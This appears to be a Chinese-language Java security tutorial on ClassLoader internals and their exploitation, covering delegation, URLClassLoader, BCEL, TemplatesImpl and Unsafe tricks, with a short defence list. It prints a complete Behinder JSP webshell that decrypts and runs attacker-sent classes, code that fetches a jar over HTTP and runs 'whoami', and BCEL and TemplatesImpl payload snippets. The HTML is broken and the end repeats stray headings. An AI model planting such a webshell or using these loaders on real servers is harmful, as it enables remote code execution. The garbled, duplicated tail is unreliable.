Java ClassLoader 深入理解与安全利用<\/h1>

前言<\/h2>
ClassLoader 是 Java 安全研究中基础且核心的部分。本文将全面讲解 ClassLoader 的工作原理、不同类型 ClassLoader 的特点，以及如何利用 ClassLoader 机制进行安全攻击和防御。<\/p>

Java 类与 Class 文件基础<\/h2>

Java 源代码编译后会生成 .class<\/code> 文件，这是 JVM 可执行的字节码文件。例如：<\/p>

public<\/span> class<\/span> Heihu577<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args){<\/span>
<\/span><\/span>        System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"Hello World"<\/span>);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>编译和执行过程：<\/p>
javac Heihu577.java  \/\/ 生成 Heihu577.class
java Heihu577        \/\/ 执行 main 方法
<\/code><\/pre>
查看字节码：<\/p>
javap -c -p -l Heihu577.class
<\/code><\/pre>
Java 类加载器体系<\/h2>
类加载器类型<\/h3>
Java 有三个核心类加载器：<\/p>


Bootstrap ClassLoader<\/strong>：<\/p>

最顶层的加载器，加载核心类库（%JRE_HOME%\/lib 下的 rt.jar、resources.jar 等）<\/li>
由 C\/C++ 实现，Java 中无法直接引用，返回 null<\/li>
可通过 System.getProperty("sun.boot.class.path")<\/code> 查看加载路径<\/li>
<\/ul>
<\/li>

Extension ClassLoader (ExtClassLoader)<\/strong>：<\/p>

加载 %JRE_HOME%\/lib\/ext 目录下的 jar 包<\/li>
可通过 System.getProperty("java.ext.dirs")<\/code> 查看路径<\/li>
可使用 -Djava.ext.dirs<\/code> 参数修改扫描路径<\/li>
<\/ul>
<\/li>

Application ClassLoader (AppClassLoader)<\/strong>：<\/p>

加载 CLASSPATH 下的类<\/li>
可通过 System.getProperty("java.class.path")<\/code> 查看路径<\/li>
父加载器是 ExtClassLoader<\/li>
<\/ul>
<\/li>
<\/ol>
双亲委派机制<\/h3>
类加载流程遵循双亲委派模式：<\/p>

类加载器首先检查是否已加载该类<\/li>
未加载则委托父加载器尝试加载<\/li>
父加载器无法加载时，才由自己加载<\/li>
<\/ol>
优点<\/strong>：<\/p>

防止核心类被篡改<\/li>
避免类重复加载<\/li>
<\/ul>
打破双亲委派<\/strong>：<\/p>

重写 loadClass()<\/code> 方法可打破双亲委派机制<\/li>
<\/ul>
URLClassLoader 详解<\/h2>
URLClassLoader 是 ExtClassLoader 和 AppClassLoader 的父类，可以从指定 URL 加载类和资源。<\/p>
基本使用<\/h3>
File file =<\/span> new<\/span> File(<\/span>"D:\/MyJarTest.jar"<\/span>);<\/span>
<\/span><\/span>URL[]<\/span> urls =<\/span> new<\/span> URL[]{<\/span>file.<\/span>toURL<\/span>()};<\/span>
<\/span><\/span>URLClassLoader urlClassLoader =<\/span> new<\/span> URLClassLoader(<\/span>urls);<\/span>
<\/span><\/span>Class<?><\/span> clazz =<\/span> urlClassLoader.<\/span>loadClass<\/span>(<\/span>"com.utils.SayHello"<\/span>);<\/span>
<\/span><\/span>Object o =<\/span> clazz.<\/span>newInstance<\/span>();<\/span>
<\/span><\/span>Method hi =<\/span> clazz.<\/span>getMethod<\/span>(<\/span>"hi"<\/span>);<\/span>
<\/span><\/span>hi.<\/span>invoke<\/span>(<\/span>o);<\/span>
<\/span><\/span><\/code><\/pre>远程加载 WebShell<\/h3>
URL[]<\/span> urls =<\/span> new<\/span> URL[]{<\/span>new<\/span> URL(<\/span>"http:\/\/127.0.0.1:8000\/MyJarTest.jar"<\/span>)};<\/span>
<\/span><\/span>URLClassLoader urlClassLoader =<\/span> new<\/span> URLClassLoader(<\/span>urls);<\/span>
<\/span><\/span>Class<?><\/span> clazz =<\/span> urlClassLoader.<\/span>loadClass<\/span>(<\/span>"CMD"<\/span>);<\/span>
<\/span><\/span>Method method =<\/span> clazz.<\/span>getMethod<\/span>(<\/span>"Exec"<\/span>,<\/span> String.<\/span>class<\/span>);<\/span>
<\/span><\/span>String result =<\/span> (<\/span>String)<\/span> method.<\/span>invoke<\/span>(<\/span>null<\/span>,<\/span> "whoami"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>自定义 ClassLoader<\/h2>
实现步骤<\/h3>

继承 ClassLoader 抽象类<\/li>
重写 findClass()<\/code> 方法<\/li>
在 findClass()<\/code> 中调用 defineClass()<\/code><\/li>
<\/ol>
示例：<\/p>
public<\/span> class<\/span> CustomClassLoader<\/span> extends<\/span> ClassLoader {<\/span>
<\/span><\/span>    private<\/span> String baseUrl;<\/span>
<\/span><\/span>    
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    protected<\/span> Class<?><\/span> findClass(<\/span>String name)<\/span> throws<\/span> ClassNotFoundException {<\/span>
<\/span><\/span>        byte<\/span>[]<\/span> b =<\/span> loadClassData(<\/span>name);<\/span>
<\/span><\/span>        if<\/span> (<\/span>b ==<\/span> null<\/span>)<\/span> throw<\/span> new<\/span> ClassNotFoundException();<\/span>
<\/span><\/span>        return<\/span> defineClass(<\/span>name,<\/span> b,<\/span> 0<\/span>,<\/span> b.<\/span>length<\/span>);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    private<\/span> byte<\/span>[]<\/span> loadClassData<\/span>(<\/span>String name)<\/span> {<\/span>
<\/span><\/span>        \/\/ 从文件系统加载类字节码
<\/span><\/span><\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>类加密与解密<\/h3>
使用异或+Base64加密类文件：<\/p>
public<\/span> static<\/span> byte<\/span>[]<\/span> Byte2Base64<\/span>(<\/span>byte<\/span>[]<\/span> data,<\/span> int<\/span> v)<\/span> {<\/span>
<\/span><\/span>    \/\/ 异或加密后Base64
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> static<\/span> byte<\/span>[]<\/span> Base642Byte<\/span>(<\/span>byte<\/span>[]<\/span> base64,<\/span> int<\/span> v)<\/span> {<\/span>
<\/span><\/span>    \/\/ Base64解码后异或解密
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>冰蝎 WebShell 分析<\/h2>
冰蝎 WebShell 核心逻辑：<\/p>
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%>
<%!
class U extends ClassLoader {
    U(ClassLoader c) { super(c); }
    public Class g(byte[] b) { return super.defineClass(b, 0, b.length); }
}
%>
<%
if (request.getMethod().equals("POST")) {
    String k = "e45e329feb5d925b";
    session.putValue("u", k);
    Cipher c = Cipher.getInstance("AES");
    c.init(2, new SecretKeySpec(k.getBytes(), "AES"));
    new U(this.getClass().getClassLoader())
        .g(c.doFinal(new sun.misc.BASE64Decoder()
        .decodeBuffer(request.getReader().readLine())))
        .newInstance().equals(pageContext);
}
%>
<\/code><\/pre>
BCEL ClassLoader 利用<\/h2>
基本使用<\/h3>
JavaClass javaclass =<\/span> Repository.<\/span>lookupClass<\/span>(<\/span>Calc.<\/span>class<\/span>);<\/span>
<\/span><\/span>String calcEncode =<\/span> Utility.<\/span>encode<\/span>(<\/span>javaclass.<\/span>getBytes<\/span>(),<\/span> true<\/span>);<\/span>
<\/span><\/span>String payload =<\/span> "
<\/span><\/span><\/span>$$
<\/span><\/span><\/span>BCEL
<\/span><\/span><\/span>$$
<\/span><\/span><\/span>"<\/span> +<\/span> calcEncode;<\/span>
<\/span><\/span>Class<?><\/span> clazz =<\/span> new<\/span> ClassLoader().<\/span>loadClass<\/span>(<\/span>payload);<\/span>
<\/span><\/span>clazz.<\/span>newInstance<\/span>();<\/span> \/\/ 触发静态代码块
<\/span><\/span><\/span><\/code><\/pre>代码审计利用点<\/h3>
当遇到 Class.forName(可控,true,可控)<\/code> 时可能触发漏洞：<\/p>
Class.<\/span>forName<\/span>(<\/span>payload,<\/span> true<\/span>,<\/span> 
<\/span><\/span>    (<\/span>ClassLoader)<\/span> ""<\/span>.<\/span>getClass<\/span>()<\/span>
<\/span><\/span>        .<\/span>forName<\/span>(<\/span>"com.sun.org.apache.bcel.internal.util.ClassLoader"<\/span>)<\/span>
<\/span><\/span>        .<\/span>newInstance<\/span>());<\/span>
<\/span><\/span><\/code><\/pre>Xalan ClassLoader (TemplatesImpl)<\/h2>
利用链分析<\/h3>
TemplatesImpl templates =<\/span> new<\/span> TemplatesImpl();<\/span>
<\/span><\/span>\/\/ 通过反射设置_bytecodes、_name、_tfactory等字段
<\/span><\/span><\/span><\/span>templates.<\/span>newTransformer<\/span>();<\/span> \/\/ 触发恶意类加载
<\/span><\/span><\/span><\/code><\/pre>恶意类要求<\/h3>
必须继承 AbstractTranslet<\/code>：<\/p>
public<\/span> class<\/span> Evil<\/span> extends<\/span> AbstractTranslet {<\/span>
<\/span><\/span>    static<\/span> {<\/span> \/* 恶意代码 *\/<\/span> }<\/span>
<\/span><\/span>    public<\/span> void<\/span> transform<\/span>(<\/span>DOM document,<\/span> SerializationHandler[]<\/span> handlers)<\/span> {}<\/span>
<\/span><\/span>    public<\/span> void<\/span> transform<\/span>(<\/span>DOM document,<\/span> DTMAxisIterator iterator,<\/span> SerializationHandler handler)<\/span> {}<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>Unsafe 类利用<\/h2>
获取 Unsafe 实例<\/h3>
\/\/ 方法1：反射构造方法
<\/span><\/span><\/span><\/span>Constructor<?><\/span> c =<\/span> Unsafe.<\/span>class<\/span>.<\/span>getDeclaredConstructor<\/span>();<\/span>
<\/span><\/span>c.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>Unsafe unsafe =<\/span> (<\/span>Unsafe)<\/span>c.<\/span>newInstance<\/span>();<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 方法2：反射theUnsafe字段
<\/span><\/span><\/span><\/span>Field f =<\/span> Unsafe.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"theUnsafe"<\/span>);<\/span>
<\/span><\/span>f.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>Unsafe unsafe =<\/span> (<\/span>Unsafe)<\/span>f.<\/span>get<\/span>(<\/span>null<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>关键方法<\/h3>

defineClass<\/code>:<\/li>
<\/ol>
unsafe.<\/span>defineClass<\/span>(<\/span>"Evil"<\/span>,<\/span> bytecode,<\/span> 0<\/span>,<\/span> bytecode.<\/span>length<\/span>,<\/span> 
<\/span><\/span>    ClassLoader.<\/span>getSystemClassLoader<\/span>(),<\/span> new<\/span> ProtectionDomain(...));<\/span>
<\/span><\/span><\/code><\/pre>
defineAnonymousClass<\/code>:<\/li>
<\/ol>
Class<?><\/span> clazz =<\/span> unsafe.<\/span>defineAnonymousClass<\/span>(<\/span>Class.<\/span>class<\/span>,<\/span> bytecode,<\/span> null<\/span>);<\/span>
<\/span><\/span>clazz.<\/span>newInstance<\/span>();<\/span>
<\/span><\/span><\/code><\/pre>
allocateInstance<\/code>:<\/li>
<\/ol>
\/\/ 绕过构造方法创建实例
<\/span><\/span><\/span><\/span>Object obj =<\/span> unsafe.<\/span>allocateInstance<\/span>(<\/span>Evil.<\/span>class<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>防御措施<\/h2>

禁止不受信任的代码动态加载类<\/li>
严格控制 ClassLoader 的使用权限<\/li>
更新 JDK 版本（如 Java 8u251+ 移除 BCEL）<\/li>
对反序列化操作进行严格过滤<\/li>
使用 SecurityManager 限制敏感操作<\/li>
<\/ol>
总结<\/h2>
ClassLoader 机制是 Java 安全的核心基础，理解其工作原理对于安全研究和防御至关重要。从基本的类加载过程到高级的利用技巧，本文涵盖了 ClassLoader 的主要知识点和安全考虑。在实际应用中，应当谨慎使用动态类加载功能，并采取适当的安全措施防止恶意利用。<\/p>

Java ClassLoader 深入理解与安全利用<\/h1>

前言<\/h2> ClassLoader 是 Java 安全研究中基础且核心的部分。本文将全面讲解 ClassLoader 的工作原理、不同类型 ClassLoader 的特点，以及如何利用 ClassLoader 机制进行安全攻击和防御。<\/p>

Java 类加载器体系<\/h2>

URLClassLoader 详解<\/h2> URLClassLoader 是 ExtClassLoader 和 AppClassLoader 的父类，可以从指定 URL 加载类和资源。<\/p>

自定义 ClassLoader<\/h2>

BCEL ClassLoader 利用<\/h2>

Xalan ClassLoader (TemplatesImpl)<\/h2>

Unsafe 类利用<\/h2>

前言<\/h2>
ClassLoader 是 Java 安全研究中基础且核心的部分。本文将全面讲解 ClassLoader 的工作原理、不同类型 ClassLoader 的特点，以及如何利用 ClassLoader 机制进行安全攻击和防御。<\/p>

URLClassLoader 详解<\/h2>
URLClassLoader 是 ExtClassLoader 和 AppClassLoader 的父类，可以从指定 URL 加载类和资源。<\/p>